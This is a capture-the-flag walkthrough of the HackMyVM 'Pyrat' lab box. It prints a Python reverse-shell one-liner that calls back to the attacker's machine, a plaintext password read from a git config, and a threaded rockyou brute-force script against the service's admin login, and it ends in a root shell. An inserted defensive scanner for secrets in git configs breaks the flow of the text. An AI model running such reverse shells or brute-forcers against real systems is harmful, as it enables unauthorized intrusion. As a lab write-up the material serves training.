[HackMyVM] Lab box: Pyrat

kali: 192.168.56.104

Target machine: 192.168.56.123

Port scan

# nmap 192.168.56.123    
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-19 15:36 CST
Nmap scan report for 192.168.56.123
Host is up (0.00040s latency).
Not shown: 998 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
8000/tcp open  http-alt
MAC Address: 08:00:27:B2:CD:3D (Oracle VirtualBox virtual NIC)

Two ports are open: 22 and 8000.

Look at 8000 first.

Try a basic connection.

After connecting with nc, testing showed that Python statements sent to the service get executed.

Spawn a reverse shell.

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.104",4567));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")
# nc 192.168.56.123 8000


import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.104",4567));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")
# nc -lvnp 4567
listening on [any] 4567 ...
connect to [192.168.56.104] from (UNKNOWN) [192.168.56.123] 35634
bash: /root/.bashrc: Permission denied
www-data@Pyrat:~$ /usr/bin/script -qc /bin/bash /dev/null
/usr/bin/script -qc /bin/bash /dev/null
bash: /root/.bashrc: Permission denied

There is also no SUID privilege escalation route.

www-data@Pyrat:/tmp$ find / -type f -perm -4000 2>/dev/null
find / -type f -perm -4000 2>/dev/null
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/at
/usr/bin/fusermount
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/mount
/usr/bin/su
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/umount

Digging through the filesystem, the password of user think turned up in /opt/dev/.git/config.

www-data@Pyrat:/opt/dev/.git$ cat config
cat config
[core]
        repositoryformatversion = 0
        filemode = true
        bare = false
        logallrefupdates = true
[user]
        name = Jose Mario
        email = josemlwdf@github.com

[credential]
        helper = cache --timeout=3600

[credential "https://github.com"]
        username = think
        password = _TH1NKINGPirate$_

think/_TH1NKINGPirate$_
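A defender-side check tied to the leak above: a scanner (added here, not code from the box or the walkthrough) that parses git config files and flags any secret stored literally in a [credential ...] section, which is exactly how the think password ended up on disk. It assumes the standard INI-like git config layout shown above; the sample config and its secret are constructed.

```python
import os
import re
from typing import Iterator, List, Tuple

# Keys whose literal value in a git config is a stored secret.
SECRET_KEYS = {"password", "token", "oauth_token"}
_SECTION_RE = re.compile(r'^\s*\[([^\]]+)\]\s*$')
_KEY_RE = re.compile(r'^\s*([A-Za-z][A-Za-z0-9-]*)\s*=\s*(.*?)\s*$')

def find_leaked_secrets(config_text: str) -> List[Tuple[str, str, str]]:
    # Git config is INI-like: '[section]' / '[section "sub"]' headers, then
    # tab-indented 'key = value' lines. Returns (section, key, masked value).
    findings, section = [], ""
    for line in config_text.splitlines():
        if not line.strip() or line.lstrip().startswith(("#", ";")):
            continue
        sec = _SECTION_RE.match(line)
        if sec:
            section = sec.group(1).strip()
            continue
        kv = _KEY_RE.match(line)
        if kv and kv.group(1).lower() in SECRET_KEYS and kv.group(2):
            value = kv.group(2)
            findings.append((section, kv.group(1).lower(), value[:2] + "*" * (len(value) - 2)))
    return findings

def scan_tree(root: str) -> Iterator[Tuple[str, str, str, str]]:
    # Walk root and yield (path, section, key, masked) for each .git/config hit.
    for dirpath, _dirs, files in os.walk(root):
        if os.path.basename(dirpath) == ".git" and "config" in files:
            path = os.path.join(dirpath, "config")
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    text = fh.read()
            except OSError:
                continue
            for section, key, masked in find_leaked_secrets(text):
                yield path, section, key, masked

# Constructed sample mirroring the shape of the leaked file (placeholder secret).
SAMPLE_CONFIG = (
    '[core]\n\tbare = false\n[user]\n\tname = Jose Mario\n'
    '[credential]\n\thelper = cache --timeout=3600\n'
    '[credential "https://github.com"]\n\tusername = think\n\tpassword = EXAMPLE_SECRET\n'
)

if __name__ == "__main__":
    for hit in find_leaked_secrets(SAMPLE_CONFIG):
        print("secret stored in git config:", hit)
```

Run scan_tree("/") on a host to list every repository whose config carries a literal credential; the fix is a credential helper that does not write plaintext (or a token with narrow scope), not a longer cache timeout.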

# ssh  think@192.168.56.123
think@192.168.56.123's password: 
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-150-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

 System information disabled due to load higher than 1.0

 * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
   just raised the bar for easy, resilient and secure K8s cluster deployment.

   https://ubuntu.com/engage/secure-kubernetes-at-the-edge

Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

You have mail.
Last login: Thu Jun 15 12:09:31 2023 from 192.168.204.1
think@Pyrat:~$ 

User access obtained.

The mailbox contains a hint.

think@Pyrat:/var/mail$ cat think
From root@pyrat  Thu Jun 15 09:08:55 2023
Return-Path: <root@pyrat>
X-Original-To: think@pyrat
Delivered-To: think@pyrat
Received: by pyrat.localdomain (Postfix, from userid 0)
        id 2E4312141; Thu, 15 Jun 2023 09:08:55 +0000 (UTC)
Subject: Hello
To: <think@pyrat>
X-Mailer: mail (GNU Mailutils 3.7)
Message-Id: <20230615090855.2E4312141@pyrat.localdomain>
Date: Thu, 15 Jun 2023 09:08:55 +0000 (UTC)
From: Dbile Admen <root@pyrat>

Hello jose, I wanted to tell you that i have installed the RAT you posted on your GitHub page, i'll test it tonight so don't be scared if you see it running. Regards, Dbile Admen

There is something on GitHub.

A Python script was found there, but it was not of much use.

At this point I just looked at the walkthrough, which provides a brute-force script.

import socket
from threading import Thread

# Define the server's address and port
server_address = ('192.168.56.123', 8000)  # Replace with your server's address and port


# First script: send every word from a local wordlist and show the responses
# that do not simply echo the word back.
def send_word(word):
    # Create a socket object
    client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    try:
        # Connect to the server
        client_socket.connect(server_address)

        # Send the word to the server
        client_socket.sendall(word.encode())

        # Receive data from the server (if applicable)
        response = client_socket.recv(1024)
        response = response.decode()
        if word not in response:
            print(f"Sent: {word} | Received: {response}")

    except ConnectionRefusedError:
        print("Connection was refused. Is the server running?")

    finally:
        # Close the socket connection
        client_socket.close()


def read_wordlist_from_file(filename):
    # errors='ignore' because rockyou.txt contains bytes that are not valid UTF-8
    with open(filename, 'r', errors='ignore') as file:
        wordlist = file.readlines()
        return [word.strip() for word in wordlist]


# Path to the wordlist file
wordlist_filename = 'wordlist.txt'

# Read words from the file
words = read_wordlist_from_file(wordlist_filename)

# Iterate through the words and send each one to the server
for word in words:
    send_word(word)


# Second script: try each candidate as the admin password.
def test_this(password):
    # Create a socket object
    client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    try:
        # Connect to the server
        client_socket.connect(server_address)

        # Send the word to the server
        client_socket.sendall('admin'.encode())

        # Receive data from the server (if applicable)
        response = client_socket.recv(1024)
        response = response.decode()
        if 'Password' in response:
            # password is a str; the socket needs bytes
            client_socket.sendall(password.encode())

            response = client_socket.recv(1024)
            response = response.decode()

            if 'Password' not in response:
                print('Password:', password)

    except ConnectionRefusedError:
        print("Connection was refused. Is the server running?")

    finally:
        # Close the socket connection
        client_socket.close()


def test_creds():
    wordlist = '/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt'
    passwords = read_wordlist_from_file(wordlist)
    threads = []
    for password in passwords:
        thread = Thread(target=test_this, args=(password, ))
        thread.start()
        threads.append(thread)

        # Run at most 30 connections at a time
        if len(threads) >= 30:
            for thread in threads:
                thread.join()
            threads = []

    # Wait for the last partial batch
    for thread in threads:
        thread.join()


test_creds()

The walkthrough gives two scripts; the second part is the brute force.

The brute force eventually recovered the password: september.

Open a terminal or command prompt.

Run the following command to connect to the server:

 nc <server_ip> <server_port>
Replace <server_ip> with the IP address of the server where the script is running and <server_port> with the port number specified in the script (8000 in this case).

After connecting, you can interact with the script using the following commands:

Admin: To access the admin functionality, type admin and press Enter. You will be prompted to enter a password. Enter the password and press Enter. If the password is correct, you will see the message "Welcome Admin!!! Type 'shell' to begin". You can then proceed to use the shell functionality.

Shell: To access the shell functionality, type shell and press Enter. This will spawn a shell on the server, allowing you to execute commands. You can enter any valid shell command, and the output will be displayed on your nc session.

Python Interactive: To execute python commands on the server just send your python commands and it will be passed to the exec function.

Note: Make sure to replace <server_ip> with the actual IP address of the server running the script.

Following the README's hints:

After connecting with nc, type admin, then the password, then shell to get root.

# nc 192.168.56.123 8000 
admin
Password:
september
Welcome Admin!!! Type "shell" to begin
shell 
# ls
ls
pyrat.py  root.txt  snap
# cat root.txt
cat root.txt
b***************

Author: tao0845